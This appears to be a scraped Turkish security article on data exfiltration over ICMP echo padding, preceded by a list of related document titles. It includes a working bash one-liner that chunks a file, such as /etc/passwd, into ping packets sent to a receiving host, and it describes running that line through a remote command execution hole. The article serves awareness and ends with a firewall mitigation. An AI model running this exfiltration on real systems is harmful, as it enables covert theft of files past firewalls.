ICMP Deyip Geçmeyin 19.11.2011, A. Kadir Altan, kadiraltan-hotmail-com



Benzer belgeler
TCPDump Kullanımı. Afşin Taşkıran. Tcpdump, Unix/Linux benzeri sistemler için vazgeçilmez paket yakalama ve analiz aracıdır.

Saldırı Tespit ve Engelleme Sistemleri Eğitimi Ön Hazırlık Soruları

ERİŞİM ENGELLEME DOS VE DDOS:

Pardus 2013 te Metin Editörleri

Güvenlik Duvarı ve İçerik Filtreleme Sistemlerini Atlatma Yöntemleri. Huzeyfe ÖNAL Bilgi Güvenliği AKADEMİSİ

HAZIRLAYAN BEDRİ SERTKAYA Sistem Uzmanı CEH EĞİTMENİ

Bilgisayar Sistemleri ilk ortaya çıktığında...

DHCP kurulumu için Client/Server mimarisine sahip bir ağ ortamı olmalıdır ki bu da ortamda bir Domain Controller olmasını zorunlu kılar.

Sızma Testlerinde İleri Düzey Teknikler. Ozan UÇAR

Temel masaüstü bileşenleri

Sızma Testlerinde İleri Düzey Teknikler. Ozan UÇAR

Bildiğimiz gibi commanda ekranın çok çeşitli sorgulamalar yapılabilir.bunlara örnek olarak

Kurumsal Güvenlik ve Web Filtreleme

Asiston Hizmetleri Bilgilendirme Kitapçığı

WEB SUNUCU GÜVENLİĞİ: Web Siteleri Neden Hacklenir?

Kurumsal Güvenlik ve Web Filtreleme

Regular Expressions Version 0.1

SAMURAİ FRAMEWORK İLE HACKİNG-1 (FOOTPRINTING)

Beykent Üniversitesi Uzaktan Eğitim Sisteminde tüm eğitim ve öğretim faaliyetleri bir Web yazılımı olan Beykent Üniversitesi Öğretim Yönetim Sistemi

TCP / IP NEDİR? TCP / IP SORUN ÇÖZME

Linux Kurulumu (Sürüm 1.52) İçindekiler

Elbistan Meslek Yüksek Okulu GÜZ Yarıyılı Ara Salı, Çarşamba Öğr. Gör. Murat KEÇECĠOĞLU

ICMP (Internet Control Message Protocol-İnternet Kontrol Mesaj Protokolü) METEHAN POLAT-FIRAT ÜNİVERSİTESİ YAZILIM MÜHENDİSLİĞİ

Gazi Üniversitesi Mühendislik Fakültesi Bilgisayar Mühendisliği Bölümü. Bilgisayar Ağları Dersi Lab. 2

SSH Tünelleme ile İçerik Filtreleyicileri Atlatmak

BIL411 - BİLGİSAYAR AĞLARI LABORATUVARI

Aktif Dizin Logon/Logoff Script Ayarları Versiyon

/pikalite / bilgipi /pikalite EĞİTİM HİZMETLERİMİZ

Bilgisayar Mühendisliği Bölümü. Cisco PT Kullanımı. Arzu Kakışım BİL 372 Bilgisayar Ağları. GYTE - Bilgisayar Mühendisliği Bölümü

PHP I PHP I. E. Fatih Yetkin. 26 Eylül 2011

Bilgi Güvenliği Denetim Sürecinde Özgür Yazılımlar. Fatih Özavcı Bilgi Güvenliği Danışmanı

Web Uygulamarına Yönelik DoS DDoS Saldırıları ve Performans Testleri. Barkın

Örnek bir kullanım ve bilgisayar ağlarını oluşturan bileşenlerin özeti

01 Şirket Profili

Yerel Okul Sunucusu Uygulama Yazılımları Prototipi

Yeni Nesil Güvenlik Duvarlarında Olması Beklenen Özellikler ve Uygulama Bazlı Filtreleme

Exploit.CVE Analizi

Temel Linux Eğitimi 1., 2. ve 3. Bölümler

Apache üzerinden Red Hat 5 yüklenmesi

Gazi Üniversitesi Mühendislik Fakültesi Bilgisayar Mühendisliği Bölümü. Bilgisayar Ağları Dersi Lab. 2. İçerik. IP ICMP MAC Tracert

-D delete : Zinciri silmek için kullanılan komut; Silme işlemi için ya zincir numarası belirtilir ya da kuralın kendisi.

YENİ NESİL SİBER GÜVENLİK OPERASYON MERKEZİ (SGOM) Koruma, Tespit, Müdahale ve Tahmin. BARİKAT BİLİŞİM GÜVENLİĞİ Murat Hüseyin Candan Genel Müdür

Ağ Nedir? Birden fazla bilgisayarın iletişimini sağlayan printer vb. kaynakları, daha iyi ve ortaklaşa kullanımı sağlayan yapılara denir.

Linux işletim sistemlerinde dosya hiyerarşisinde en üstte bulunan dizindir. Diğer bütün dizinler kök dizinin altında bulunur.

Kampüs Ağlarında Köprü-Güvenlik Duvarı (Bridge Firewall) ve Transparent Proxy

Ağ Trafik ve Forensik Analizi

BİLGİSAYAR AĞLARI VE İLETİŞİM

qmail ile SPAM engelleme Devrim Sipahi Dokuz Eylül Üniversitesi

PHP 1. Hafta 2.Sunum

Web Uygulama Saldırıları ve Klasik Çözümlerin Yetersizliği

TL-WPS510U PRINT SERVER KURULUM DÖKÜMANI

MEB (K12) e-posta Sistemi Kullanımı

AHTAPOT Merkezi Güvenlik Duvarı Yönetim Sistemi Kontrol Paneli

DRAYTEK VIGOR 3300V VPN Dial-out Fonksiyonu

Özgür Yazılımlar ile Kablosuz Ağ Denetimi

PARÇALARA AYIRMA ve YENİDEN KURMA

ProFTPD FTP Sunucusu. Devrim GÜNDÜZ. TR.NET Sistem Destek Uzmanı.

Ağ Sızma Testleri ve 2. Katman Saldırıları Türk Standardları Enstitüsü Yazılım Test ve Belgelendirme Dairesi Başkanlığı

EPC-N KÜMES OTOMASYONU. Cloud. EPC-N Uygulama Notu 03 - Cloud

Pardus. S.Çağlar Onur, 21 Aralık Pardus Projesi [TÜBİTAK / UEKAE] Linux Kullanıcıları Derneği

Hping ile IP, ICMP ve UDP Paketleri Oluşturma

KURUM AĞLARINI ÖNEMLĠ ZARARLI YAZILIM SALDIRILARINDAN KORUMA. Osman PAMUK

Hping kullanarak TCP/IP Paketleriyle Oynama Hping-I

Pardus. A. Murat Eren, 25 Mart Pardus Geliştiricisi. Pardus Yenilikleri Sık Sorulan Sorular

TELTONİKA ROUTER LARDA HABERLEŞME SÜREKLİLİĞİNİ SAĞLAYAN UYGULAMALAR

MCR02-AE Ethernet Temassız Kart Okuyucu

Kişisel Web Sayfası Tasarım Sistemi

Temel Linux Eğitimi. İçindekiler

Elbistan Meslek Yüksek Okulu Güz Yarıyılı

Kabuk Programlama (Bash)

BIND ile DNS Sunucu Kurulumu

Icerik filtreleme sistemlerini atlatmak icin kullanacağımız yöntem SSH Tünelleme(SSH in SOCKS proxy ozelligini kullanacagiz).

MODSECURITY DENETİM KAYITLARINI ANLAMAK. Gökhan Alkan,

Trickbot Zararlı Yazılımı İnceleme Raporu

AMAÇLAR: GÜVENLİK TESTLERİNDE BİLGİ TOPLAMA: AKTİF BİLGİ TOPLAMA

LİNUX İŞLETİM SİSTEMİNİN KÖPRÜ MODUNDA ÇALIŞTIRILMASI VE GÜVENLİK DUVARI İŞLEMLERİ

$ rm dosya1 dosya2 dosya3 dosya4 dosya5 dosya6 dosya7 dosya8

Kurumsal Ağlarda Web Sistem Güvenliği

Bilgi ve Olay Yönetim Sistemi

AntiKor Güvenlik Sunucumu nereye yerleştirmeliyim?

Alt Ağ Maskesi (Subnet Mask)

Bunyamin Demir, <bunyamindemir at gmail dot com>, webguvenligi.org, 20/01/2011 ORACLE VERĠTABANI TRAFĠĞĠNĠN GÜVENLĠĞĠ

Bilgi ve İletişim Teknolojileri (JFM 102) Ders 7. LINUX OS (Sistem Yapısı) BİLGİ & İLETİŞİM TEKNOLOJİLERİ. LINUX Yapısı

Hızlı Başlangıç Kılavuzu

VERİ KAYNAKLARI. Bilgi sisteminin öğelerinden biride veri

Google Dokümanları Kullanmak

Ipv6 Egitimi. Mustafa Reşit Şahin. Software Engineer.

Web Server Sunucu Loglarının K-Komşu Algoritması ile İ ncelenmesi

Ağ Yönetiminin Fonksiyonel Mimarisi

Bilgisayar Yazılımları

Elbistan Meslek Yüksek Okulu GÜZ Yarıyılı Kas Salı, Çarşamba Öğr. Gör. Murat KEÇECİOĞLU

C0R3 Bilişim Güvenliği Grubu

AMASYA ÜNİVERSİTESİ BİLGİ İŞLEM DAİRE BAŞKANLIĞI HİZMET ENVANTERİ TABLOSU

.. YILI BİLGİSAYAR SİSTEM KURULUM BAKIM ONARIM VE ARIZA GİDERME KURS PLANI MODÜL SÜRESİ

Saldırgan Bakış Açısı ile Değer Yaratmak

-Bilgisayarı oluşturan iki temel unsurdan diğeri ise YAZILIM dır.

Güvenlik Mühendisliği

.. YILI BİLGİSAYAR SİSTEM KURULUM BAKIM ONARIM VE ARIZA GİDERME KURS PLANI MODÜL SÜRESİ

Transkript:

ICMP Deyip Geçmeyin 19.11.2011, A. Kadir Altan, kadiraltan-hotmail-com "Bundan da ne olacak ki?"... Bilişim güvenliğinde çok sık karşılaştığımız bir tepki. Oysa yazılımcı ya da ağ sorumlusunun ciddiye almadığı sıradan gözüken bir konu, güvenlik uzmanının önlem almasını gerektirebilir. O zaman da duymaya alıştığı bu tepkiyle karşılaşır: "Bundan da ne olacak ki?". Bu konuda en güzel örneklerden birisi belki de ICMP paketleri. İç ağ bölümleri arasında ICMP Echo paketleri, her sistem ve ağ yöneticisinin işini kolaylaştıran, sorunlari çözmede vazgeçilmez bir araç. Çok sık ve her yerde ihtiyaç duyulması sebebiyle de güvenlik duvarlarında bu zararsız gözüken paketlerin geçişine ihtiyaç göz önünde bulundurulmadan sınırsız izin verme alışkanlığı yaygın. Güvenlik duvarı ayarlarında bu paketlere sınırsız izin verilmesini engellediğinizde sistem ve ağ yönetimini zorlaştırdığınız da doğru. Yine de bazı özel durumlarda hassas bir ağ bölümünden bilgi sızmasını engellemek için dikkat etmeniz gereken bir protokol. Bu yolla veri sızdırmanın ne kadar kolay olabileceğini göstermek işin ciddiyetini anlatmaya yardımcı olacaktır. Bunun için çok yaygın kullanılan ping aracı bile yeterlidir. Gerçek hayatta ICMP ile bilgi sızması tehlikesine karşı önlem alınması gerekecek senaryolar çok karmaşık olabilir. Biz örneğimizi basit hayali senaryolar üzerinden anlatalım. Burada amaç, bu masum iznin komut satırında basit bir bash betiği ile bile ne kadar da kolay istismar edilebileceğini göstermek. Güvenlik duvarı arkasındaki ağlara veri iletiminde ICMP echo paketlerinin padding için ayrılan byte larından faydalanacağız. Sızdığınız veya uzaktan komut çalıştırabileceğiniz bir güvenlik açığı barındıran sistemlerde kolayca kullanabileceğiniz ping komutu ile ICMP Echo Request gönderebilirsiniz. Üstelik standart bir kullanıcının yetkisi olmayan IP paketi işleyebilme özelliğini de kullanarak. Linux sistemlerde standart ping komutunda -p parametresi ile istenilen veriyi sınırlı uzunlukta da olsa HEX biçiminde vererek ICMP paketinin içine gömmek mümkün.

Aşağıdaki bash betiğinde bundan faydalanarak seçtiğimiz bir dosya parçalara ayıracak ve her bir parçayı ayrı ayrı ICMP paketleriyle dışarıya göndereceğiz: while read -n16 leakme; do ping 10.0.0.1 -p $(echo $leakme xxd -p -u) -c 1; done </iamsecret.txt Test ortamımızda kaynak ve hedef ağlar sırasıyla 192.168.12.0/24 ve 10.0.0.0/24 olsun. Senaryomuzda arada bulunan güvenlik duvarı yalnızca ICMP paketlerinin geçişine müsade etmekte. Sunucudan(192.168.12.137) sızdırmak isteyeceğimiz bilgi /tmp/iamsecret.txt dosyasında bulunuyor.

Saldırıdan önce ping in komut satırından nasıl çalıştığını görelim: Burada yaptığımız işlem kısaca, bir dosyanın içeriğini parçalara bölerek her parçayı uygun biçime(hex) çevirdikten sonra ping komutu ile ICMP Echo Request paketlerinin padding byte larına gömmek.

Ağda paketlerin izlediği yol üzerinde bulunan bir cihazdan paketleri dinleyecek olursak sızdırmak istediğimiz dosyamızı paketlerin içerisinde görmek mümkün: Uzaktan komut çalıştırabileceğimiz güvenlik açığı barındıran bir web sayfamız olsaydı, o zaman bu betiği ufak bir uyarlama ile komut satırı yerine web sayfası üzerinden çalıştırıp dışarıya ulaştırmak da mümkün olacaktı:

Bu sefer /etc/passwd dosyasını kaçırmak isteyelim. İstismar edeceğimiz uzaktan komut çalıştırma açığı için küçük bir uyarlama gerekmekte: Kendi bilgisayarımıza gönderdiğimiz ICMP paketlerinde /etc/passwd dosyasının içeriğini parça parça görmek mümkün. Bu sefer paketleri gördüğümüz bilgisayar ağda farkli bir notkada bulunması ve NAT sebebiyle kaynak IP farklı gözükmekte:

Bir sonraki adım olarak bu betiğin bir komutun çıktısını iletecek hale dönüştürülmesi ilgilenenlere güzel bir egzersiz olacaktır Gösterilmeye çalışılan örneklerin basitliği yanıltmasın. Gerçek hayatta tehlike yaratacak yapılar çok daha karmaşık olacaktır ama bu kadarı bile küçümsenen ya da önlem alınmamış basit bir noktanın ne kadar kolay istismar edilebileceğini göstermek için yeterli. Normal kullanıcı olarak yapmaya yetkiniz olmayan IP paketi işlemek gibi hareketleri, başka bir amaçla da olsa buna sınırlı yetkisi olan ping komutu ile yapabilirsiniz. Bu sayede tek bir satırla bu durumu istismar etmek de mümkün hale gelmekte. Tabi ki ICMP den vazgeçmek mümkün değil. Önlem olarak ise güvenlik duvarlarında yalnızca gerekli kaynaklar haricinde izin verilmemesi ilk adım için uygun bir önlem olabilir. Referanslar 1) ICMP ve padding bytes http://en.wikipedia.org/wiki/internet_control_message_protocol 2) Ping, http://linux.die.net/man/8/ping 3) Lorem Ipsum, http://www.lipsum.com/